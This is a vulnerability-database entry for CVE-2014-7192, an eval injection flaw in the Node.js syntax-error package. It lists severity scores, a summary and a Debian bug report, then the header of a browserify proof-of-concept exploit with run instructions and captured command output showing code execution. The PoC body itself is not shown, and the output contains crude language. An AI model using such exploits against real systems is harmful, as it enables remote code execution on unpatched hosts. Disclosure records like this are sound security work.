CVE-2014-7192

Published: 11/12/2014 Updated: 08/09/2017
CVSS v2 Base Score: 10 | Impact Score: 10 | Exploitability Score: 10
VMScore: 1000
Vector: AV:N/AC:L/Au:N/C:C/I:C/A:C

Vulnerability Summary

Eval injection vulnerability in index.js in the syntax-error package prior to 1.1.1 for Node.js 0.10.x, as used in IBM Rational Application Developer and other products, allows remote malicious users to execute arbitrary code via a crafted file.

Vulnerable Product

joyent node.js

Vendor Advisories

Debian Bug report logs - #773623
nodejs: CVE-2014-7192
Package: libv8-314; Maintainer for libv8-314 is Debian Javascript Maintainers <pkg-javascript-devel@lists.alioth.debian.org>; Reported by: Michael Gilbert <mgilbert@debian.org>
Date: Sun, 21 Dec 2014 03:09:02 UTC
Severity: serious
Tags: jessie-ignore, security, ...

Exploits

#!/usr/bin/python
"""
Browserify POC exploit

iops.io/blog/browserify-rce-vulnerability/

To run, just do:

$ python poc.py > exploit.js
$ browserify exploit.js
BITCH I TOLD YOU THIS SHIT IS FABULOUS
[[garbage output]]
},{}]},{},[1])
00:08:32 up 12:29, 3 users, load average: 0.00, 0.02, 0.05
uid=1001(foxx) gid=1001(foxx) groups=1001 ...